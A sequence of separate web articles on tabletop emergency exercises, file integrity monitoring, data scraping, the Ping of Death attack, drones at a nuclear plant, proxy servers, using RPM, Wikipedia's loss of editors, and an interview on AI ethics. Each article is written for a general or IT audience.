Nearly every student and employee has experienced a fire drill, tornado drill, or some other scenario-based activity designed to improve situational awareness and coordinated response in the event of a disaster. These are typically activities meant to test a specific procedure or set of desired actions under a safety officer or other personnel’s direct supervision. A tabletop exercise is more than just a drill, however.
According to the Homeland Security Exercise Evaluation Program (HSEEP), a tabletop fits into four different types of exercises that organizations use to evaluate their emergency plans and procedures:
- Walkthroughs, workshops, or orientation seminars
- Tabletop exercises
- Functional exercises
- Full-scale exercises
Use a walkthrough for basic team training so they can begin to familiarize themselves with their roles and responsibilities. During a walkthrough, team members will come to understand the various emergency responses they can expect along with how the organization’s business continuity plans will unfold. Finally, a walkthrough is a useful time to make sure everyone understands the communication process.
As mentioned above, tabletop exercises are coordinated discussions for team members to talk about their roles during an emergency and how they might react in various scenarios. Most walkthroughs will use a facilitator to guide the discussion. Depending on the tabletop exercise’s objectives and scope, they may require a few hours or multiple days.
A functional exercise enables emergency team members to perform their duties in a simulated environment. For this type of exercise, a scenario is given, such as a specific hazard or a critical business system’s failure. With a functional exercise, participants are seeking to “try out” particular procedures and resources.
You may have participated in a full-scale exercise as part of the military, municipal government job, or as an employee at a healthcare organization. With this type of exercise, the more “real” the experience can be for participants, the better. Ahead of full-scale exercises, local businesses, law enforcement agencies, and news organizations are typically notified and often given roles to play as well.
Tabletop Exercise Participants
When planning a tabletop exercise, it helps to let participants know what is expected of them. Below are the most common roles assigned to individuals in the room.
Tabletop exercises are not passive events. Participants should be willing to jump into the conversation as needed. Be pleasant—remember that everyone wants to find solutions for emergencies, and the best time to do that is while the “emergency” doesn’t exist! It’s also important that participants go with the flow and embrace the objectives of the scenario at hand. Perhaps you think that another scenario would be a better choice or feel your role is less vital to the discussion than others in the room. Instead of derailing the exercise, stay engaged and try to accept the limits of the chosen scenario. Speak up if your role confuses you or if something doesn’t make sense.
Facilitators should control the pace and flow of the exercise. They should nudge the discussion along if needed and look for participants who may hang back from expressing their thoughts. Focus on drawing out solutions from the group. Ask questions to encourage deeper thinking about potential issues that may be encountered.
Evaluators play an essential role in documenting the outcomes of the tabletop exercise, highlighting both positive actions taken during the scenario and areas for improvement. Evaluators are also often involved in developing the After Action Report (AAR), which details lessons learned and recommendations for future planning, training, and exercises.
A tabletop exercise observer is typically in the room to passively follow the proceedings and provide an additional perspective about topics that fall outside your participants’ direct purview or expertise. If you invite observers, make sure they know they can answer questions or give feedback as appropriate when prompted by the larger group.
Pros and Cons of Tabletop Exercises
If it’s not evident already, we strongly recommend tabletop exercises and believe that—used effectively—they can dramatically improve any organization’s emergency preparedness and response plans. However, like most tools, they are a better fit for some jobs than others. Here are some of the most commonly cited advantages and disadvantages of tabletop exercises.
- Tabletop exercises are a low-cost yet highly effective method for evaluating emergency plans, responses, and roles in a stress-free environment.
- Tabletop exercise participants also find that the low-stress environment is a great way to calmly work out issues, clarify roles and responsibilities, and document best practices with a larger group’s collaboration.
- Given current technology, remote participants—including remote employees and external partners—can participate in tabletop exercises without the organization incurring excessive travel expenses or lost productivity.
Of course, not every method is perfect. Here are some drawbacks of tabletop exercises:
- Tabletop exercises can’t perfectly replicate the sense of urgency your team will experience in a real emergency, so they aren’t a true test of what your team can do operationally in the heat of the moment.
- Also, given tabletop exercises’ somewhat formal structure may lull some participants into thinking emergency planning and emergency response are always simple and straightforward (which often is not the case).
- They won’t strain resources to the extent that an actual event or rehearsal would. For example, if a stairwell’s size would hinder an evacuation, this might be overlooked in a simple tabletop exercise.
Additional Considerations for Effective Tabletop Exercises
Condensed exercise time frame
Participants should expect that the exercise will proceed in a condensed time frame, so events will unfold rapidly—not necessarily how they would in the real world. Remind the team that a real emergency will require flexible time management skills. For instance, a slow-moving weather system may give the team days to prepare, but it can wreak havoc in mere minutes when the storm arrives.
Leaders should prepare detailed scenario information ahead of time with position-specific events to guide everyone through what they are supposed to do during the emergency. Make sure your team has access to this packet ahead of time. Consider leveraging a modern emergency communication solution with Event Pages to simulate a communication exercise during the tabletop.
Communicating with employees during emergencies
We recommend using a mass notification system such as AlertMedia to reach employees on any device through various channels. Options such as app push notifications, text, voice, email, and social media ensure maximum deliverability. Two-way messaging ensures employers can stay in touch with employees, even in emergency situations.
Stay on top of critical events as they happen
Of course, you’ll also need to document your processes for reporting emergencies, unplanned business disruptions, and other critical events. Combining analyst-verified threat intelligence with location data for your people, facilities, and assets will help you identify incidents faster and minimize response times as you implement your plans.
Tabletop exercises are a useful tool for emergency planners everywhere. With some preparation and foresight, this low-cost planning tool can help your organization better prepare for an emergency, communicate faster during critical events, and take action with confidence.
Learn more at AlertMedia. | <urn:uuid:126ef9d1-533f-428f-afa8-3022a73fb0e6> | CC-MAIN-2022-40 | https://continuityinsights.com/how-tabletop-exercises-can-help-your-business-prepare-for-emergencies/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334644.42/warc/CC-MAIN-20220926020051-20220926050051-00594.warc.gz | en | 0.932388 | 2,076 | 2.6875 | 3 |
What Is File Integrity Monitoring?
FIM is a security technology that monitors and detects changes in files that could be indicative of a cyberattack.
“We are trying to make sure that files that should not be tampered with are not tampered with,” says Timothy Brown, vice president of security at IT management solutions company SolarWinds. “FIM is used not just for single files but for systems and applications. We define an initial state and then look to see if anything is different.”
Where other cyberdefenses may detect aberrant behaviors in a system, FIM looks at the systems themselves. “Basically, it’s a verification method,” says Shawn McCarthy, research director at IDC Government Insights. “It compares the current state of a file to a previously measured baseline.”
Why focus on change as a marker of potential threat? Because virtually every cyber exploit will seek to alter key system elements, including Windows registry, drivers, installed software and applications. “Most breaches don’t take place without having some kind of change to these elements,” says Gartner Principal Analyst Mitchell Schneider. “The sooner you can detect these signs of compromise, the faster you are able to respond.”
Ideally, FIM will be configured to pay special attention to the most sensitive functions and files. In federal government, this means watching for alterations in any systems that may handle personally identifiable information.
“Does it have a driver’s license or Social Security numbers? If so, there will be restrictions for which users can access that file, who is entitled to open it, who has access to modify it, and who has the ability to copy it or use it; for example by attaching it to an email,” says Morey Haber, CTO and CISO at BeyondTrust.
By keeping a constant check on the integrity of such files, “FIM raises up the policy level, enabling you to control access on a data-centric model,” Haber says.
How Does File Integrity Monitoring Work?
When FIM notices an unanticipated file change, it sends an alert to the administrators. The art here lies in defining the parameters in order to not be deluged by false positives. Rather than raise a flag every time a comma gets changed, FIM should be configured to look for deep system changes, especially tweaks to functions and processes that ought to be left alone.
“There are certain baselines that never change, like the operating system file: It came with the operating system, and it should never be altered until a patch comes out. A policy document should never change unless it’s an approved change,” Brown says.
If a file suddenly becomes encrypted, or executable files are altered, those actions should set alarm bells ringing.
“When we talk about FIM we’re talking about not just the content of the file but the attributes of the file — read, write, execute. FIM is looking at key settings that could be used to make an application work or make it vulnerable,” Haber says.
For changes at the system level, the IT shop should have a change management process in place to authorize and validate changes that are legitimate and necessary. FIM is looking for alterations that take place outside those parameters. “What you want is an alert when something happens that is not part of the normal runtime. A common case on a Linux box would be the host file and the password file: No one is supposed to modify those,” Haber says.
In addition to issuing alerts, FIM can be configured to drive automated response. It generally won’t remediate potential threats — those go to human operators for review — but it can weed out the false positives. For example, it can compare a change with a whitelist of approved changes, such as scheduled patches. This helps ensure the IT team sees only those alerts that represent true potential threats.
“It’s checking changes against what is happening according to plan, and only warning the analysts when something falls outside that existing loop of planned or accepted changes,” Schneider says.
What Are Baseline Comparison and Real-Time Change Notifications?
Two key concepts in FIM are the baseline comparison and real-time change notification. Essentially, these represent two different ways of implementing FIM that can be used separately or in tandem. Each approach can yield valuable insights, although the real-time strategy will, as the name suggests, offer more opportunity for timely response.
A baseline comparison starts with a snapshot or template that depicts the system in its optimal, initial state. “It’s basically like an image of your system,” McCarthy says. A subsequent scheduled review looks for variations from that initial state. “The software can notify system managers if a discrepancy is found. Some tools may allow different levels of notification, depending on what is found and where it occurs, such as whether the change is detected in individual files, operating systems or access control.”
Real-time notification on the other hand tracks changes as they occur. “It looks at the operating system and records the activity: Someone read this file, someone rewrote this file,” Brown says.
Real-time notification may seem like the obvious choice. If you know what’s happening as soon as it happens, you’re obviously in a better position to take timely action. But there are limitations to real-time scanning that can tilt the balance in favor of a baseline approach. If files are extraordinarily large, for example, or if users need superfast access to systems, the real-time review can slow down the works. In such cases, Haber says, a baseline comparison may be preferable.
When real-time notification is available, though, it can deliver powerful capabilities. “Doing it in real time allows you to block the change,” Haber says. “It gives you more of the protective capability, versus baseline, which has no defensive or blocking capability.”
How Can File Integrity Monitoring Benefit Federal Agencies?
Feds need FIM for regulatory compliance, as noted. In addition, given the particular nature of the federal IT infrastructure, FIM can be a powerful addition to an existing cybersuite.
Government IT is heavy with legacy and idiosyncratic systems, many of which may carry undocumented cyberweaknesses.
“There are still a lot of those things in place, and government needs a way to make sure a vulnerability has not taken hold in one of those systems,” Brown says. “Typically, the exploit will act in a certain way: It will put something in the registry or change a file system. FIM allows you to identify those changes, which in turn shows you whether a vulnerability has been exploited.”
Moreover, FIM can be fine-tuned to give special priority to high-value assets, such as those containing personal information. “Sensitivity of data is the first concern on the federal side,” Haber says. “FIM can detect whether a file has sensitive information on it and can help with change control by ensuring that changes to files are done appropriately, and by helping to prevent any inappropriate changes.”
Such capabilities can make FIM an especially attractive solution to those charged with safeguarding government systems. | <urn:uuid:f07fff7f-8653-4f58-b1bd-be693c47d017> | CC-MAIN-2022-40 | https://fedtechmagazine.com/article/2019/10/how-file-integrity-monitoring-can-help-feds-improve-cybersecurity-perfcon | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334644.42/warc/CC-MAIN-20220926020051-20220926050051-00594.warc.gz | en | 0.935541 | 1,536 | 2.859375 | 3 |
There has been a lot said about data scraping. Here is a breakdown of what it is, why it might be problematic and how we might deal with it going forward.
For a recent example of abusive data scraping, we do not have to go too far back in time: In April 2021, researchers discovered a database containing the personal details of more than 500 million Facebook users, which was circulating on hacker forums. Not much later, similar news reports surfaced about a LinkedIn database dataleak. Analysis of both incidents showed that hackers did not even need to attack the servers of the social media platforms to get hold of the data. They made use of a handy trick called "data scraping". How does this technique work and how big is the danger of data scraping for Internet users?
Data scraping is essentially a way of transferring data from one system to another. But it differs from more conventional data transfer methods. The main difference is in the output. The scraped data does not serve as input for another computer program, but is intended for display to the end user. Data scraping is therefore a very crude technique that will only be used when there is no other way to extract data from a system, such as an operating system that is no longer compatible with modern hardware. The output is often very unstructured because things like formatting, binary data and other additional information are not transferred. This can even cause programs to crash during data scraping.
There are different technical variants within data scraping. The oldest form is screen scraping. With screen scraping, a special tool is connected to an obsolete computer system. The scraping tool pretends to be a user and simulates the key commands to navigate through the system interface. The tool then extracts the data from the system and passes it on to the new system. This method of working inspired more modern automation tools that work on the same basis.
In addition to screen scraping, there is also web scraping, which is used to extract data from web pages. The principle is more or less the same. Again, you usually need a scraping tool to make the web page believe that you are a web administrator who is going to modify the page. Most websites today have built-in security algorithms to detect such tools and deny them access. So large-scale scraping incidents like those at Facebook are really very rare – at least as far as we know so far.
Data scraping is not in itself an illegal practice. Recognised cloud providers such as Amazon AWS offer secure web scraping tools in the form of free APIs. Like any computer program, data scraping only becomes dangerous when the tools fall into the wrong hands. As happened at Facebook, to refer back to that incident.
In the Facebook scraped dataleak incident the database did contain personal data such as phone numbers and email addresses. If cybercriminals get hold of this data, they can use it for phishing and other types of fraud. So it is true that data scraping is initially a lot less intrusive than hacking into someone's account and you will probably not be directly affected by a scraping attack. But in the long run, it can make you more vulnerable to phishing attacks. The recent LinkedIn scraped data leak seems less intrusive and showed less interesting data however every kind of data can always be interesting for every cybercriminal or hacker. Data scraping can open the door to spear phishing attacks; hackers can learn the names of superiors, ongoing projects, trusted companies or organizations, etc. Essentially, everything a hacker could need to craft their message to make it plausible and provoke the correct response in their victims.
As a user of a website, there is basically not much you can do against a scraping attack, except carefully manage what information you share about yourself on that website. With Facebook as an example, therefore do a regular privacy check to find out what you actually share or not. Ultimately, the responsibility lies in what you share yourself. And that’s probably not always that easy looking to all the problems we see these days. Also, bear in mind that the effects that result from someone accessing your personal information might not manifest for a long time. By the point someone abuses your data, you might already have forgotten that you even shared it with the network at some point.
You must keep in mind that everything that is visible and accessible on your website to human visitors is possibly also visible to scrapingbots. There are also some technical tricks that can be applied to secure the content. However, these tricks often have their limitations. You can often recognise a scraping attempt by a high number of requests sent to your website from a single IP address (not to be confused with a DDoS attack, which also relies on this technique). You can then exclude that suspicious IP address. In other cases, locking content with login details can go a long way. The scraper then has to expose a piece of itself in order to get access to the content. Regularly changing your HTML can confuse scrapers to such an extent that they do scrape elsewhere. The downside of this is that this approach can also lead to confusion among your own web developers. The use of CAPTCHAs or lots of media files can also discourage scraping attempts by shady individuals. Bots are sometimes coded to explicitly break specific CAPTCHA patterns or may employ third-party services that utilize human labor to read and respond in real-time to CAPTCHA challenges. On the legal side: companies need to take action against data scrapers and warn them against the process. This can be included in the terms of service. Of course this doesn’t do anything against scraping by itself but it can be used during lawsuits.
Diverse actors leverage web scraping bots, including nefarious competitors, internet upstarts, cybercriminals, hackers, and spammers, to effortlessly steal whatever pieces of content they are programmed to find, and often mimic regular user behavior, making them hard to detect and even harder to block. Web scraping pose a critical challenge to a website’s brand, it can threaten sales and conversions, lower SEO rankings, or undermine the integrity of content that took time and resources to produce. But there is even a bigger problem behind it which lies in the growth of the phishing attempts or ransomware attacks which could be based on the stolen and scraped data of the users of the attacked website. That’s the reason why webdesigners and social media companies should be thinking twice about using the necessary actions against this kind of attacks in the future. Understanding the intrusive nature of today’s web scraping danger not only raises awareness about this growing challenge, it also allows website owners to take action in the protection of their proprietary and the privacy of their users! Let’s hope they all read this blog. | <urn:uuid:12106658-7977-4924-980e-9607a17579e0> | CC-MAIN-2022-40 | https://www.gdatasoftware.com/blog/data-scraping | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334644.42/warc/CC-MAIN-20220926020051-20220926050051-00594.warc.gz | en | 0.954896 | 1,365 | 3.1875 | 3 |
A Ping of Death (PoD) is a type of Denial of Service (DoS) attack that deliberately sends IP packets larger than the 65,536 bytes allowed by the IP protocol. One of the features of TCP/IP is fragmentation; allowing a single packet to be broken down into smaller segments.
This DoS attack started back in the 90’s, where most operating systems didn’t know what to do when they received an oversized packet, so they froze, crashed, or rebooted. Ping of Death attacks are particularly brutal because the identity of the attacker sending the oversized packet could be easily ‘spoofed’ since the attacker doesn’t need to know anything about the victim, except their IP address. By the end of the 90’s, operating systems made patches available for users to avoid the ping of death. Still, many sites block Internet Control Message Protocol (ICMP) ping messages at their firewalls to prevent any future variations of this kind of denial of service attack.
What does this mean for an SMB?
A Distributed Denial of Service attack may pose a potential threat against gambling companies or other mid-to-large enterprises such as banks and defense contractors. DDoS attacks are rarely used against SMB’s unless they upset a hacker group. In other cases, one hacking group against another.
We are not saying it won’t happen, but the cost of protection is so great in many cases, the advice to an SMB is to know what it is, and establish a relationship with a DDoS protection vendor without paying for protection. DDoS protection vendors include Arbor Networks, AT&T, Verizon, and Akamai. Mid-to-Large enterprises should have contracts in place to protect themselves in seconds when hit with a DDOS attack. SMB’s should not. | <urn:uuid:91190795-15cb-405d-9552-7bf0f2e04607> | CC-MAIN-2022-40 | https://cyberhoot.com/cybrary/ping-of-death-pod/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335004.95/warc/CC-MAIN-20220927100008-20220927130008-00594.warc.gz | en | 0.943201 | 383 | 2.90625 | 3 |
Falcon Eye Drones (FEDS) has underscored the importance of drones in increasing workplace safety while speeding up inspection measures to unlock the full potential of the Arab world’s sole Peaceful Nuclear Energy Programme—the Barakah Nuclear Energy Plant in Abu Dhabi—that aims to generate clean electricity in the next 60 years.
Hailing the launch of the UAE’s nuclear power plant, Rabih Bou Rashid, CEO of FEDS, said that drones can help ensure the gold standards of safety and reliability of the country’s US$32 billion power plant, which is expected to offset approximately 21 million tonnes of greenhouse gas emissions a year, or equivalent to removing 3.2 million cars from the country’s roads annually.
“The Barakah Nuclear Energy Plant is a significant step towards the UAE’s vision to deliver a new source of clean energy. It is a pioneering project that targets to deliver up to a quarter of the nation’s electricity needs, becoming a true milestone for this forward-thinking nation,” said Bou Rashid.
He noted that as the UAE remains committed to thrust science and technology, it is likely that it will employ only top-of-the-line technology, such as drones, in protecting and maintaining this Arab world’s pride.
Providing a clear insight about how drone applications are now being utilised in the nuclear industry today, the CEO said that drones play a vital role in site condition monitoring on nuclear sites across the globe because of its wide scope of advantages over these ground-based technologies.
An eye for safety
With the drones’ ability to inspect confined spaces and areas beyond the human’s line of sight, FEDS said these unmanned utility vehicles (UAVs) can perform flawless assessments and capture crucial data in nuclear power plants without putting the workforce in harm’s way.
Prior to drones, Bou Rashid said surveying nuclear power plants required workers to don heavy anti-contamination suits. They also need to bring a radiation monitor—which exposes them to 250 millirem of radiation (around 10% of the limit for radiation exposure yearly).
“Since drones are immune to radiation, inspectors can employ them to gather superior data—even around the most inaccessible spaces—without exposing workers to unnecessary dangers,” said Bou Rashid.
Recently, Swiss drone manufacturing company, Flyability used its collision-resistant drones—Elios 2—in an annual survey of the tank rooms at a nuclear power plant, capturing every edge of the area without the need for any human intervention.
The application of drones in the nuclear power sector has also been accelerated by the accident at Fukushima Daiichi Power Plant in 2011. Drones allowed them to get a clear picture of the situation, as well as trace the changes in the reactors’ isotopic distribution.
Flyability’s data added that drones are now utilised in over 30% of all of the nuclear power plants in the US. These UAVs are deployed regularly to prevent sending workers to physical inspections in radioactive environments, thereby increasing workplace safety.
In Norway, meanwhile, drone pilot Lieutenant Bård Alexander Raunlid said that they have entered a cooperation with the country’s Radiation and Nuclear Safety Authority in 2019 to utilise drone-based radiation detectors on Coast Guard vessels.
Gathering accurate mapping
Bou Rashid said that drones’ capacity to comprehensively post-process data can play a crucial role in completing the set-up and maintaining the operations of the Barakah Nuclear Energy Plant in the most cost-efficient way possible.
“UAVs provide a first-hand full perspective of the site that was previously unrealistic to obtain, as well as help inspectors identify any potential deviations that could, in the future, dent its budget and even pose dangers to workers,” he said.
The CEO also underscored how drones can record areas using photogrammetry, allowing inspectors to view the nuclear site from different angles. He added that the information captured by drones can also be used to build information models and even virtual reality systems to help inspectors truly immerse in the data.
Bou Rashid also noted that the accurate data-gathering features of drones can cut time wastage by 18.4%.
In the assessment done by Elios 2 at DSRL nuclear site, the time spent for tank inspection was drastically downsized from 1.5 hours to 15 minutes, he explained.
Meanwhile, Ontario Power Generation, dubbed as Canada’s largest clean energy project, decided to obtain a fleet of 18 drones in 2018 following their first aerial survey success in 2015. “With that acquisition, they got 100% photo record of the site through drones, which they have referred to many times since. This has saved them time from the traditional methods that involved a construction of a tall crane,” Bou Rashid said.
He believes that through the adoption of parallel technology, the Barakah Nuclear Energy Plant will undoubtedly achieve its fullest potential and goals of providing sustainable electricity source.
“As the UAE once again sets the bar high in modern science through Barakah Nuclear Energy Plant, drones will be vital to the leaders’ objective of providing clean energy and commercially competitive option which could make a significant contribution to the UAE’s economy and future energy security,” said the FEDS CEO. | <urn:uuid:c68f6d48-8485-4aa5-8727-bc57777828c4> | CC-MAIN-2022-40 | https://internationalsecurityjournal.com/drones-utilised-to-protect-abu-dhabi-nuclear-power-plant/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335004.95/warc/CC-MAIN-20220927100008-20220927130008-00594.warc.gz | en | 0.927778 | 1,125 | 2.6875 | 3 |
A proxy server, which sits between a user and the Internet, provides a variety of benefits, including improved performance, security, and privacy. A proxy server is configured by specifying the IP address of the proxy server as its gateway to the Internet. This can be done for all traffic or only certain types of traffic (most commonly web traffic).
Configuring a proxy means that certain types of traffic will be sent to the proxy server instead of directly to the Internet. This allows the user to conceal their IP address from the websites, or an organization can use a proxy server to impose access controls and content filtering. The proxy server forwards the traffic on to its destination and sends any responses received on to its client.
Proxy servers all act to forward traffic from a client to a server and back again. However, a few different types of proxy servers exist, all with slightly different functionality:
Proxy servers and virtual private networks (VPNs) are both designed to protect the user’s privacy. Yet they have slightly different goals and accomplish them in different ways.
Proxy Servers are primarily designed to protect the user from the server that it is connecting to. This may include concealing their identity (via anonymous proxies) or performing filtering of web traffic (such as blocking potentially malicious or inappropriate sites). Proxy servers are generally not designed to protect a user from third parties.
Remote Access VPNs are designed to protect the confidentiality of the connection between a client and a server. All traffic flows through an encrypted tunnel, which makes it impossible for eavesdroppers to view the traffic. However, the server at the other end of the connection has full access to the traffic, meaning that a VPN does nothing to protect a user’s privacy or security against a malicious server.
Both proxy servers and reverse proxies sit between a client and a server. They too are designed to provide different benefits.
Proxy servers are deployed on behalf of the client. One or more clients may use the same proxy server, which can provide increased privacy, security, etc.
Reverse proxies are designed to benefit the server. A reverse proxy server may act as a single point of content for multiple servers on an organization’s network. The use of a reverse proxy enables an organization to have sites served from multiple servers appear to originate from the same machine. Additionally, a reverse proxy can provide increased security by performing traffic filtering and by making it impossible for an external user to gain direct access to an organization’s servers.
A proxy server provides a number of benefits to its users, such as:
While a proxy server has a number of benefits, it also has its limitations, including:
A proxy server can be a standalone system, but it can also be integrated into an organization’s firewall. Check Point next-generation firewalls (NGFWs) integrate proxy functionality and are recognized as a Leader by Gartner. To learn more about Check Point NGFWs and their capabilities, you’re welcome to contact us. | <urn:uuid:95b5cb72-4e45-4bee-adc4-a5836db336cf> | CC-MAIN-2022-40 | https://www.checkpoint.com/cyber-hub/network-security/what-is-a-proxy-server/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335004.95/warc/CC-MAIN-20220927100008-20220927130008-00594.warc.gz | en | 0.951521 | 613 | 3.40625 | 3 |
If you’ve maintained a Linux system for a while, you’ve probably noticed that you have more and more files every day, especially if you install software. And unless you have a photographic memory, you’ll probably find it difficult to remember what files go with what piece of software, especially after months or years.
In fact, the problem is worse than that. Different packages can have subtle incompatibilities with other packages, especially if they were installed months or years apart. A shared library that was installed with one package might turn out to break another package. And if this problem doesn’t show up immediately, it may well show up a few weeks later when you’ve forgotten what changes you had made.
RPM can help dramatically with these problems; under most circumstances, it seems to Do the Right Thing in a rather magical way.
RPM stands for Red Hat Package Manager, and it keeps track of the packages you install. Among other things, it:
If it sounds too good to be true, it really isn’t. Most of the time, RPM silently installs and removes packages cleanly and correctly; the rest of the time, it warns you that you are trying to do something you shouldn’t.
Examples of use
Here are a few examples that show RPM in action.
Installing a package is as simple as:
(as 'root') # rpm -i svgalib-1.2.10.rpm
This simple command installs version 1.2.10 of the package ‘svgalib’. Assuming you don’t have any version conflicts, RPM says nothing and your software is installed in the right place.
Removing a package is also simple:
# rpm -e svgalib
As long as no other RPM-installed package requires svgalib version 1.2.10, this will silently remove all the files that were installed with the previous command. (Note that you aren’t required to specify the version number! Under the reasonable assumption that you don’t have two versions of the same library installed, RPM removes the currently installed version.)
To query a package:
# rpm -q svgalib svgalib-1.2.13-3
This command tells you what version you have installed currently.
To get a list of all installed packages:
# rpm -qa [mito@baf mito]$ rpm -qa |head setup-1.9.1-2 filesystem-1.3.1-3 basesystem-4.9-2 adjtimex-1.3-3 anonftp-2.5-1 ldconfig-1.9.5-3 [...]
This command presents a list of all packages, including version numbers, that have been installed with RPM.
To find out what a package requires:
# rpm -qR glibc /sbin/ldconfig
Hmm, ‘glibc’ requires a file called /sbin/ldconfig. What else requires this file?
# rpm -q --whatrequires /sbin/ldconfig ldconfig-1.9.5-3 glibc-2.0.7-13 libtermcap-2.0.8-7 [...]
Very interesting. However, most of the time you won’t need to find out this information; most installs and removals work perfectly, and you won’t have to investigate the tangled interdependencies between the packages.
RPM has become the most widely used package manager in the Linux world, in part because it works well, and in part because it is an integral part of the popular Red Hat distribution. Because of its popularity, RPMs can be found all over the place. People who offer their own software often build RPM distributions in addition to the time-honored .tar.gz ‘tarball’ format.
The Red Hat site itself has a huge collection of RPMs; these can also likely be found on the CD that you have if you bought the commercial version of RPM.
There’s also a much larger collection of RPMs here.
When you can’t use RPM
If your Linux install is old, you might have some trouble using RPM. This is not because RPM is a new thing but because many RPMs are binary RPMs. This means that they contain software that has already been compiled.
It is possible that the software had been compiled using libraries or header files that are much newer (or older) than your own, and the binaries will not work on your system. In this case, you might have to build the software yourself and install it without the benefit of RPM; or you might be able to download a source RPM, which has many of the same features of a binary RPM but contains source code that is built on your system.ø
1. www.rpm.org The central RPM site.
Greg Travis is a freelance programmer living in New York City. | <urn:uuid:e627beb7-46fc-4e9b-94f6-8838d807dc3b> | CC-MAIN-2022-40 | https://www.datamation.com/applications/using-rpm/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335004.95/warc/CC-MAIN-20220927100008-20220927130008-00594.warc.gz | en | 0.923514 | 1,058 | 2.75 | 3 |
Wikipedia, which is arguably the most valuable source of information on the Internet, is written and edited almost entirely by volunteers. But what happens when those volunteers stop volunteering?
We’re about to find out. In the first quarter of this year, the Wikipedia lost an incredible 49,000 editors, literally ten times the number lost in the same quarter last year.
Another potential threat to Wikipedia is that its expenses could outpace costs. Currently, the site runs on donations. But if the most die-hard fans are leaving — the writers and editors — they could take their donations with them.
As volunteerism goes down, successful acts of vandalism go up, and the resource becomes increasingly unreliable, which could cause even more people to leave and even fewer people to donate. Crowdsoucing is great — until the crowd goes somewhere else.
Sorry to be a Debbie Downer, but the death of Wikipedia is the least of our problems.
It Has Happened Before
A Web 2.0 site is one that by definition gets its value from the actions of users. But what happens when the best users stop using?
We have a huge precedent: American Democracy. Everybody complains about the power of special interests in politics. But those interests have moved in to fill the vacuum left behind by lower citizen participation. A lower percentage of people engage in politics at all levels than they used to, and even fewer keep themselves informed about political issues. The result is that a smaller percentage of people participate, and the sophistication of those people is lower, too.
That’s what will happen to the Wikipedia if present trends persist. The special interests and the saboteurs will have more power, because they will be controlled, contained and countered by a smaller number of dumber people.
Another example closer to home is what happened to the Digg social bookmarking service. Digg used to be a marvel of useful content. Mostly about tech, the site quickly and reliably surfaced the most important and interesting stories.
But two things wrecked it. First, Digg never fixed glaring flaws, namely the laughably inconsistent categorization of content and the ability of a tiny number of super users to completely dominate the service. Second, Digg introduced social communication, then abandoned it. A great many users invested countless hours and enormous energy building up a social network, only to have all those links erased by Digg. Digg has been experiencing an exodus of its own for the past year.
And look at Digg now. The home page is mostly garbage that falls into one of three categories: 1) sensationalist nonsense (“This is real footage of bears playing hockey, it’s so amazing”), 2) frivolous idiot content (“10 More Drunk Photos You Don’t Want to be Caught in”); and 3) pointless lists (“Top 10 Awesome Movie Ninjas”).
The degradation of Digg is nothing compared to other potential disasters lurking in the cloud.
What Happens When They Die?
We rely on Web 2.0 services like Wikipedia and Digg. But we’ve become dangerously reliant upon some “cloud” and online services. Many of these aren’t profitable, and rely on venture capital. In fact, it’s a near certainty that many of the services we rely on will not survive the next year or two. What happens when they go away?
What happens if they’re wiped out by hack attacks? It happened this year to AVSIM, a popular Microsoft’s Flight Simulator blog and message board site. Hackers destroyed all the user content, plus the backups of user content. Boom! Gone! Just like that.
What if they go out of business? The death of some sites would exact a terrible personal cost on many users. People rely heavily on sites like Evernote and other richly featured user-data sites; Posterous and other blog and lifestreaming sites; online backup sites like Carbonite; photo sites, calendar sites, task and to-do sites. The list goes on and on.
Some sites, such as Jott, reQall, Remember the Milk and others have become memory crutches that people rely on to function every day. If they vanish, a lot of people will be seen wandering around in the streets, forgetting the milk, etc.
Yet another class of web-based services help glue the whole Internet together. Twitter, for example, has triggered an explosion in the popularity of URL shorteners, including TinyURL, Bit.ly and others. People use shortened URLs to link things together. If the companies behind these sites go belly-up, the links vanish. A great many bloggers use photo services to host their pictures. If these crash and burn, the pictures vanish.
If the Great Recession is teaching us anything, it’s that everything can and will change. We need to proceed in our work and in our lives with the understanding that online services evolve and can even become extinct. We should consider every unprofitable startup an endangered species.
Always maintain at least two backups for everything — one online and remote, and one local. That’s old but good advice.
The new advice is be careful about which social networks you invest your time in. Your whole social network could be erased in an instant. And so, too, could URL shorteners, picture hosting sites, blog hosting sites and other services that require the survival of some vulnerable startup in order for your content to function in the future.
As great as the Wikipedia is, we can live without it. But the sites that hold our personal data, that glue the Internet together — we can’t live without those unless we’re prepared.
Optimism is a good quality. But sometimes we should listen to Debbie Downer. | <urn:uuid:a5fdcbc4-b19b-49ce-9ee5-80d46a6f2c37> | CC-MAIN-2022-40 | https://www.datamation.com/networks/the-wikipedia-exodus-is-the-least-of-our-worries/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335004.95/warc/CC-MAIN-20220927100008-20220927130008-00594.warc.gz | en | 0.934576 | 1,204 | 2.53125 | 3 |
The math is staggering: By 2020, there will be more than 50 billion connected devices on the internet.
But the bigger takeaway is that AI is already embedded in more than a billion of them.
Just ask Siri and Alexa.
Which brings us to the final installment of our conversation with AI expert and Duke University Computer Science Professor, Vincent Conitzer.
Conitzer agrees that we are on the cusp of an astonishing revolution in intelligent automation. But he also argues that being human still has its advantages.
Should we worry about AI taking over the planet? This may be an important question in the long run. But Conitzer says that today's AI is still far too limited for that.
On the other hand, he highlights controversial trends thatare on the horizon right now autonomous warfare, technological unemployment and bias in algorithms. He warns against hasty regulation of AI, and debunks some popular misconceptions about AI as well.
Hope you enjoy the conversation.
Appian: There's a lively debate going on around AI and ethics. What's your take on the ethics question? What do you see as the biggest ethical challenges facing AI?
Conitzer: One of the things I see in AI these days is that as we deploy AI in real-life settings, the objectives we pursue with it really start to matter.In the past, this wasn't a big concern, because AI was still in the laboratory...There's the example of reinforcement learning. This is a subtopic in AI where the system learns how to take action to optimize an objective.
For example, there's a problem where you have a cart moving along a track. And you have a pole standing on the cart that's connected to a hinge. So, there's risk of the pole falling over one way or the other.So, what the system is supposed to do is move the cart back and forth in such a way that the pole stays upright.
Appian: That's not a an easy problem to solve.
Conitzer: No, it's not. And it's a good benchmark for algorithms. Specifying the objective is quite easy: that the pole doesn't fall over.
